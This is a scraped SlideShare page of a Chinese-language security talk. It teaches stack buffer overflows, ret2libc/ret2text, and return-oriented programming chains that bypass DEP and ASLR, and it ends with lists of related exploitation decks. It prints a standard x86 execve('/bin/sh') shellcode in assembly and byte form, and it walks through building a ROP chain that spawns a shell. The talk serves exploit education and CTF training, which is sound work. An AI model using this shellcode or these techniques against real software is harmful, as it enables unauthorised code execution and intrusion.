SlideShare ist ein Scribd-Unternehmen logo

ROP輕鬆談 Return Oriented Programming Easy Talk

H
hackstuff

Demo File: http://l4ys.tw/f/rop_demo.zip 介紹從 Buffer Overflow 到 Return-Oriented Programming 的基本原理以及簡單的 ROP 攻擊代碼撰寫與利用方式

Technologie
1 von 82
Downloaden Sie, um offline zu lesen
ROP輕鬆談 Return Oriented Programming Easy Talk Lays @ HackStuff
Who Am I • Lays ( L4ys )! - l4ys.tw! • Reverse Engineering / Exploit! • Wargame / CTF! • HackStuff Member
Outline • Buffer Overflow! • ret2libc / ret2text! • Return Oriented Programming! • Payload & More
Buffer Overflow
Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
Function Call STACK ESP > ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > ret addr arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK ESP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK ESP > buffer EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Buffer Overflow STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... ... } ! scanf( “%s”, buffer );
Buffer Overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Buffer Overflow STACK EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA
Buffer Overflow AFTER EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA BEFORE EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2
Buffer Overflow AFTER ESP > AAAA AAAA EBP > AAAA AAAA AAAA AAAA ... mov esp, ebp pop ebp ret
Buffer Overflow AFTER ESP > AAAA AAAA AAAA ... mov esp, ebp pop ebp ret = POP EIP
Buffer Overflow AFTER ESP > AAAA AAAA ... mov esp, ebp pop ebp ret JMP AAAA
Buffer Overflow
Buffer Overflow • Shellcode! • 預先寫好的攻擊代碼! • in C / ASM xor %eax,%eax push %eax push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %eax push %ebx mov %esp,%ecx mov $0xb,%al int $0x80 "x31xc0x50x68x2fx2fx73x68x68x2fx62x69"! "x6ex89xe3x50x53x89xe1xb0x0bxcdx80"
Buffer Overflow STACK 0xFFFFD710 AAAA ... AAAA ... AAAA 0xFFFFD71C 0xFFFFD720 0xFFFFD720 Shellcode ...
Buffer Overflow • 塞滿 Buffer ! • 覆蓋函數返回地址! • 跳轉至 Shellcode 執行 AAAAAAAAAAAA > x20xD7xFFxFF > Shellcode
Exploit Mitigation • DEP ( Data Execution Prevention )! - 禁止執行位於資料區塊上的代碼! • ASLR ( Address Space Layout Randomization )! - 記憶體位置隨機化! • Stack Guard! • 函數返回前檢查 stack 結構完整
checksec.sh • Check Security Options! • checksec.sh --file <executable-file>! • checksec.sh --proc <proc name>! http://www.trapkit.de/tools/checksec.html
DEP Data Execution Prevention
Data Execution Prevention • 資料區塊上的代碼無法執行! • [X] Stack ! • [X] Heap! • 硬體支援 ( CPU NX bit )! • 可以放 shellcode ,但不能 run STACK AAAA AAAA AAAA 0xFFFFD720 Shellcode
「世界上最遙遠的距離,不是生與死」
「而是 Shellcode 就在 Stack 上,! 你卻無法執行它。」 — DEP
ret2libc / ret2text Return to existing code
ret2libc • DEP! • [X] Stack ! • [X] Heap! • [ O ] Binary! • [ O ] Shared Library
ret2libc • Return-to-libc! • Buffer Overflow 後,覆蓋返回地址為程式中現有函數地址! • 不能 return 到 shellcode,那就 return 到現有的 code 上! • 利用 libc.so 中的函數! • 偽造堆疊結構,建立函數呼叫! • e.g. system( “/bin/sh” )
ret2libc STACK AAAA AAAA system() ret address } Buffer Target Function pointer to “/bin/sh” } Fake Frame system( “/bin/sh” )
ret2libc STACK system() ret address pointer to “/bin/sh” ret system( “/bin/sh” )
ret2libc STACK ret address pointer to “/bin/sh” system( “/bin/sh” )
ASLR Address Space Layout Randomization
ASLR • 隨機分配記憶體位置! • Stack ! • Heap! • Shared library! • VDSO! • …! • 難以預測目標函數 / shellcode 位置
ret2text • Return-to-text! • return 到程式自身 code / PLT! • 沒開啟 PIE ( Position-independent Code ) 時,! ! .text 地址固定,不受 ASLR 影響! • 泄露有用資訊,搭配 ret2libc / ROP
ret2text
ret2libc / ret2text • Return-to-libc! • 需要知道目標函數地址! • 受 ASLR 影響,需配合 Memory Leak / libc.so! • static link! • Return-to-text! • 現有 code 不一定能滿足需求
ROP Return-Oriented Programming
ROP • Exploitation! • Return to Shellcode! • Return to Functions! • Return to Gadgets
ROP • RET 到自身程式包含 RET 指令的代碼區塊上
ROP • RET 到自身程式 包含 RET 指令的代碼區塊上
ROP • Buffer Overflow AAAA… + xE5x85x04x08 • RET = POP EIP STACK AAAA AAAA AAAA AAAA • 可控的 Stack 內容 • 透過 RET 再次控制 EIP
一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! ROP
Buffer Overflow to ROP Stack AAAA... 0x08040AB0 ... Overwrite ! return address
Buffer Overflow to ROP Stack AAAA... 0x08040AB0 0x08040CD0 0x08040EF0 ... Append Addresses
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... ret 0x08040AB0 xor eax, eax 0x08040AB1 ret
ROP Chain Stack 0x08040CD0 0x08040EF0 ... ... ret 0x08040CD0 inc eax 0x08040CD1 ret
ROP Chain Stack 0x08040EF0 ... ... ... ret 0x08040EF0 mov ecx, eax 0x08040EF2 ret
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... 0x08040AB0 xor eax, eax ret ! 0x08040CD0 inc eax ret ! 0x08040EF0 mov ecx, eax ret !
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
Gadgets Payload
ROP • Gadgets ! • 以 ret 結尾的指令序列! • pop ebx + pop eax + ret ! • add eax, ebx + xor eax, ecx + ret! • call eax / jmp eax! • int 0x80
Operations • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • shr … + ret! • 修改 esp! • leave + ret! • 條件跳轉!
Operations • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • …! • 修改 esp! • leave + ret! • 條件跳轉! • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret
Write To Register • 寫入 Register! • pop reg + ret! • pop reg + pop reg + ret! • pop reg + pop reg + pop reg + ret! • …
Write To Register • 寫入 eax 及 ebx! ! ! pop eax! ! ! pop ebx! ! ret!
Write To Register • 寫入 eax 及 ebx Stack 0x080400AB 0xAAAAAAAA 0xBBBBBBBB next gadget ret 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
Write To Register Stack 0xAAAAAAAA 0xBBBBBBBB next gadget ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
Write To Register Stack next gadget ... ... ... eax = 0xAAAAAAAA ebx = 0xBBBBBBBB 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
Write To Memory • 寫入 Memory! • mov [reg], reg! • mov [reg+xx], reg
Write To Memory • 寫入 Memory eax = 0xAAAAAAAA ecx = 0xBBBBBBBB mov [ecx], eax! ret *0xBBBBBBBB = 0xAAAAAAAA
System Call • System Call in ROP! • sys_execve(“/bin/sh”, NULL, NULL);
System Call • sys_execve(“/bin/sh”, NULL, NULL)! • 尋找 int 0x80 指令! • 寫入 “/bin/sh” 到記憶體! • mov [reg], reg! • 設置 register! • pop reg! • eax = 11, ebx = &“/bin/sh”, ecx = 0, edx = 0
DEMO execve in ROP
ROPGadget • 以 ROPGadget 尋找 Gadget ! • ropgadget --binary ./file! • ropgadget --binary ./file --opcode! • ropgadget --binary ./file —ropchain! • pip install ropgadget https://github.com/JonathanSalwan/ROPgadget
ROPGadget https://github.com/JonathanSalwan/ROPgadget
Conclusion • ROP Payload! • Payload 撰寫難度較高 / 重複利用性低! • Bypass ASLR / DEP! • 結合其他攻擊手段! • Load Shellcode! • ret2libc
More • Sigreturn-Oriented Programming ( SROP ) ! • 利用 sigreturn system call! • 配合假造的 frame 控制 registers! • Blind ROP ( BROP )! • 在不知道程式內容的情況下實現 ROP Exploit
Q & A
RET

Empfohlen

台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報耀德 蔡
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3Angel Boy
 
Execution
ExecutionExecution
ExecutionAngel Boy
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowAngel Boy
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolveAngel Boy
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingAngel Boy
 
Advanced heap exploitaion
Advanced heap exploitaionAdvanced heap exploitaion
Advanced heap exploitaionAngel Boy
 

Empfohlen

台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報耀德 蔡
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3Angel Boy
 
Execution
ExecutionExecution
ExecutionAngel Boy
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowAngel Boy
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolveAngel Boy
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingAngel Boy
 
Advanced heap exploitaion
Advanced heap exploitaionAdvanced heap exploitaion
Advanced heap exploitaionAngel Boy
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache ExploitationAngel Boy
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitationAngel Boy
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented ProgrammingAngel Boy
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeAngel Boy
 
Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Angel Boy
 
MacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationMacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationAngel Boy
 
Return Oriented Programming
Return Oriented ProgrammingReturn Oriented Programming
Return Oriented Programmingsounakano
 
Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Angel Boy
 
x86
x86x86
x86Wei-Bo Chen
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹CODE BLUE
 
あなたの知らないnopたち@ラボユース合宿
あなたの知らないnopたち@ラボユース合宿あなたの知らないnopたち@ラボユース合宿
あなたの知らないnopたち@ラボユース合宿MITSUNARI Shigeo
 
ret2dl resolve
ret2dl resolveret2dl resolve
ret2dl resolvesounakano
 
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015CODE BLUE
 
Glibc malloc internal
Glibc malloc internalGlibc malloc internal
Glibc malloc internalMotohiro KOSAKI
 
LR parsing
LR parsingLR parsing
LR parsingichikaz3
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Abhinav Chourasia, GMOB
 

Weitere ähnliche Inhalte

Was ist angesagt?

Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache ExploitationAngel Boy
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitationAngel Boy
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented ProgrammingAngel Boy
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeAngel Boy
 
Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Angel Boy
 
MacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationMacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationAngel Boy
 
Return Oriented Programming
Return Oriented ProgrammingReturn Oriented Programming
Return Oriented Programmingsounakano
 
Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Angel Boy
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹CODE BLUE
 
あなたの知らないnopたち@ラボユース合宿
あなたの知らないnopたち@ラボユース合宿あなたの知らないnopたち@ラボユース合宿
あなたの知らないnopたち@ラボユース合宿MITSUNARI Shigeo
 
ret2dl resolve
ret2dl resolveret2dl resolve
ret2dl resolvesounakano
 
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015CODE BLUE
 
LR parsing
LR parsingLR parsing
LR parsingichikaz3
 

Was ist angesagt? (20)

Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit Technique
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache Exploitation
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitation
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented Programming
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledge
 
Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation
 
MacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationMacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) Exploitation
 
Return Oriented Programming
Return Oriented ProgrammingReturn Oriented Programming
Return Oriented Programming
 
Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)Windows 10 Nt Heap Exploitation (Chinese version)
Windows 10 Nt Heap Exploitation (Chinese version)
 
x86
x86x86
x86
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROP
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
[CB16] House of Einherjar :GLIBC上の新たなヒープ活用テクニック by 松隈大樹
 
あなたの知らないnopたち@ラボユース合宿
あなたの知らないnopたち@ラボユース合宿あなたの知らないnopたち@ラボユース合宿
あなたの知らないnopたち@ラボユース合宿
 
ret2dl resolve
ret2dl resolveret2dl resolve
ret2dl resolve
 
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
Master Canary Forging: 新しいスタックカナリア回避手法の提案 by 小池 悠生 - CODE BLUE 2015
 
Glibc malloc internal
Glibc malloc internalGlibc malloc internal
Glibc malloc internal
 
LR parsing
LR parsingLR parsing
LR parsing
 

Ähnlich wie ROP輕鬆談 Return Oriented Programming Easy Talk

Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Abhinav Chourasia, GMOB
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_royRoy
 
04basic Concepts
04basic Concepts04basic Concepts
04basic ConceptsZhiwen Guo
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdfhasan58964
 
Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11John Wilker
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROPMihir Shah
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxSam Bowne
 

Ähnlich wie ROP輕鬆談 Return Oriented Programming Easy Talk (20)

Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
04basic Concepts
04basic Concepts04basic Concepts
04basic Concepts
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
Qemu Introduction
Qemu IntroductionQemu Introduction
Qemu Introduction
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdf
 
Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow Better
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
ROP
ROPROP
ROP
 
CNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in LinuxCNIT 127: Ch 2: Stack Overflows in Linux
CNIT 127: Ch 2: Stack Overflows in Linux
 

Mehr von hackstuff

Dvwa low level
Dvwa low levelDvwa low level
Dvwa low levelhackstuff
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defencehackstuff
 
新手無痛入門Apk逆向
新手無痛入門Apk逆向新手無痛入門Apk逆向
新手無痛入門Apk逆向hackstuff
 
Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺hackstuff
 
SQL injection duplicate error principle
SQL injection duplicate error principleSQL injection duplicate error principle
SQL injection duplicate error principlehackstuff
 
Android Security Development
Android Security DevelopmentAndroid Security Development
Android Security Developmenthackstuff
 
Algo/Crypto about CTF
Algo/Crypto about CTFAlgo/Crypto about CTF
Algo/Crypto about CTFhackstuff
 
調試器原理與架構
調試器原理與架構調試器原理與架構
調試器原理與架構hackstuff
 
cmd injection
cmd injectioncmd injection
cmd injectionhackstuff
 
Webshell 簡單應用
Webshell 簡單應用Webshell 簡單應用
Webshell 簡單應用hackstuff
 
Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖hackstuff
 
Antivirus Bypass
Antivirus BypassAntivirus Bypass
Antivirus Bypasshackstuff
 

Mehr von hackstuff (14)

Dvwa low level
Dvwa low levelDvwa low level
Dvwa low level
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defence
 
Rootkit 101
Rootkit 101Rootkit 101
Rootkit 101
 
新手無痛入門Apk逆向
新手無痛入門Apk逆向新手無痛入門Apk逆向
新手無痛入門Apk逆向
 
Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺
 
SQL injection duplicate error principle
SQL injection duplicate error principleSQL injection duplicate error principle
SQL injection duplicate error principle
 
Android Security Development
Android Security DevelopmentAndroid Security Development
Android Security Development
 
Algo/Crypto about CTF
Algo/Crypto about CTFAlgo/Crypto about CTF
Algo/Crypto about CTF
 
調試器原理與架構
調試器原理與架構調試器原理與架構
調試器原理與架構
 
cmd injection
